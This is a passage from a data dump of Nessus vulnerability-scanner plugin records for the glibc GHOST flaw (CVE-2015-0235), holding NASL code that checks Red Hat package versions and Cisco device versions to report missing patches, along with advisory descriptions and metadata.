(rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-common-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-headers-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-profile-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"glibc-utils-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nptl-devel-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"nscd-2.3.4-2.57.el4.2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-profile / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:11", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.4", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/nessus/81034", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81034);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"RHEL 6 / 7 : glibc (RHSA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x / 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0092\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-debuginfo-common-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"nscd-2.12-1.149.el6_6.5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-devel-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-static-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"nscd-2.17-55.el7_0.5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:03:51", "description": "According to its self-reported version, the Cisco Unified Communications Manager IM and Presence Server Service is affected by a heap-based buffer overflow condition in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-08-17T00:00:00", "type": "nessus", "title": "Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:unified_communications_manager_im_and_presence_service", "cpe:/a:cisco:unified_communications_manager", "cpe:/a:cisco:unified_presence_server"], "id": "CISCO_CUPS_CSCUS69785.NASL", "href": "https://www.tenable.com/plugins/nessus/85449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(85449);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69785\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco Unified Communications Manager IM and Presence GNU C Library (glibc) Buffer Overflow (CSCus69785) (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Cisco Unified\nCommunications Manager IM and Presence Server Service is affected by a\nheap-based buffer overflow condition in the GNU C Library (glibc) due\nto improper validation of user-supplied input to the glibc functions\n__nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2().\nThis allows a remote attacker to cause a buffer overflow, resulting in\na denial of service condition or the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69785\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the Cisco bug ID CSCus69785.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager_im_and_presence_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_communications_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:unified_presence_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"cisco_unified_detect.nasl\");\n script_require_ports(\"Host/UCOS/Cisco Unified Presence/version\", \"cisco_cups/system_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\n\n# Leverage SSH version first\ndisplay_version = get_kb_item(\"cisco_cups/system_version\");\nver = display_version;\n# Fall back to API\nif (isnull(display_version))\n{\n display_version = get_kb_item_or_exit('Host/UCOS/Cisco Unified Presence/version');\n match = eregmatch(string:display_version, pattern:\"^(\\d+\\.\\d+\\.\\d+\\.\\d+-\\d+)($|[^0-9])\");\n if (isnull(match)) \n audit(AUDIT_VER_FORMAT, display_version); \n ver = match[1];\n}\n\nver = str_replace(string:ver, find:\"-\", replace:\".\");\n# 7.0 - 11.0 (11 not yet released)\nif(ver_compare(ver:ver, fix:\"7.0\", strict:FALSE) >= 0 &&\n ver_compare(ver:ver, fix:\"8.6.5.15900.3\", strict:FALSE) < 0)\n fixed_ver = \"8.6.5 SU5 (8.6.5.15900-3)\";\nelse if(ver =~ \"^9\\.\" && ver_compare(ver:ver, fix:\"9.1.1.71900.2\", strict:FALSE) < 0)\n fixed_ver = \"9.1.1 SU5 (9.1.1.71900-2)\";\nelse if(ver =~ \"^10\\.[0-4]\\.\")\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\"; # Any version of 10 prior to 10.5 go to 10.5.1\nelse if(ver =~ \"^10\\.5\\.1\\.\" && ver_compare(ver:ver, fix:\"10.5.1.13900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.1 SU3 (10.5.1.13900-2)\";\nelse if(ver =~ \"^10\\.5\\.2\\.\" && ver_compare(ver:ver, fix:\"10.5.2.21900.2\", strict:FALSE) < 0)\n fixed_ver = \"10.5.2b (10.5.2.21900-2)\";\nelse if(ver =~ \"^11\\.0\\.\" && ver_compare(ver:ver, fix:\"11.0.1.10000.6\", strict:FALSE) < 0)\n fixed_ver = \"11.0.1.10000-6\";\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"CUCM IM and Presence Service\", display_version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + display_version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:23:08", "description": "The version of Cisco NX-OS software running on the remote device is affected by a remote code execution vulnerability known as GHOST. A heap-based buffer overflow condition exists in the GNU C Library (glibc) due to improper validation of user-supplied input to the glibc functions __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2(). An unauthenticated, remote attacker can exploit this to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-19T00:00:00", "type": "nessus", "title": "Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-11-14T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20150128-GHOST-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/92412", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92412);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus71708\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68770\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69648\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68591\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus68892\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n script_xref(name:\"CERT\", value:\"967332\");\n\n script_name(english:\"Cisco NX-OS GNU C Library (glibc) Buffer Overflow (GHOST)\");\n script_summary(english:\"Checks the NX-OS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Cisco NX-OS software running on the remote device is\naffected by a remote code execution vulnerability known as GHOST. A\nheap-based buffer overflow condition exists in the GNU C Library\n(glibc) due to improper validation of user-supplied input to the glibc\nfunctions __nss_hostname_digits_dots(), gethostbyname(), and\ngethostbyname2(). An unauthenticated, remote attacker can exploit this\nto cause a buffer overflow, resulting in a denial of service condition\nor the execution of arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in the vendor\nadvisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:nx-os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_nxos_version.nasl\");\n script_require_keys(\"Host/Cisco/NX-OS/Version\", \"Host/Cisco/NX-OS/Device\", \"Host/Cisco/NX-OS/Model\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\ndevice = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Device\");\nversion = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Version\");\nmodel = get_kb_item_or_exit(\"Host/Cisco/NX-OS/Model\");\n\nif (device != 'Nexus') audit(AUDIT_HOST_NOT, 'a Cisco Nexus device');\n\nbug = NULL;\nfix = NULL;\nvuln = FALSE;\nn7k = FALSE; # Used to distinguish Nexus 7000 Series models in version comparison\n\n# Cisco Nexus 1000V\nif (model =~ \"^1000[vV]$\")\n{\n bug = \"CSCus71708\";\n fix = \"5.2(1)SV3(1.4)\";\n}\n# Cisco Nexus 3000\nelse if (model =~ \"^3[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68770\";\n if (version =~ \"^6\\.0\\(2\\)A\")\n fix = \"6.0(2)A4(3.41)\";\n else if (version =~ \"^6\\.0\\(2\\)U\")\n fix = \"6.0(2)U4(3.41)\";\n}\n# Cisco Nexus 4000\nelse if (model =~ \"^4[0-9][0-9][0-9]([^0-9]|$)\" && version =~ \"^4\\.1([^0-9])\")\n{\n bug = \"CSCus69648\";\n fix = \"4.1(2)E1(1o)\";\n}\n# Cisco Nexus 5000 and Cisco Nexus 2000\nelse if (model =~ \"^5[0-9][0-9][0-9]([^0-9]|$)\" || model =~ \"^2[0-9][0-9][0-9]([^0-9]|$)\")\n{\n bug = \"CSCus68591\";\n if (version =~ \"^5\\.\") fix = \"5.2(1).N1(9)\";\n else if (version =~ \"^6\\.\") fix = \"6.0(2).N2(7)\";\n else if (version =~ \"^7\\.0\\(\") fix = \"7.0(6).N1(1)\";\n else if (version =~ \"^7\\.1\\(\") fix = \"7.1(1)N1(1)\";\n else fix = NULL;\n}\n# Cisco Nexus 7000\nelse if (model =~ \"^7[0-9][0-9][0-9]([^0-9]|$)\")\n{\n n7k = TRUE;\n bug = \"CSCus68892\";\n fix = \"6.2(12)\";\n if (\n # All versions in releases 4 and 5 affected\n version =~ \"^[45]\\.\" ||\n # All versions in 6.0 and 6.1 affected\n version =~ \"^6\\.[0-1]([^0-9]|$)\" ||\n # Versions 6.2 < 6.2(12) affected\n version =~ \"^6\\.2$\" || version =~ \"^6\\.2\\(([0-9]|1[01])\\)\"\n ) vuln = TRUE;\n}\nelse audit(AUDIT_HOST_NOT, \"an affected Cisco Nexus model\");\n\nif (!n7k && !isnull(fix) && cisco_gen_ver_compare(a:version, b:fix) < 0) vuln = 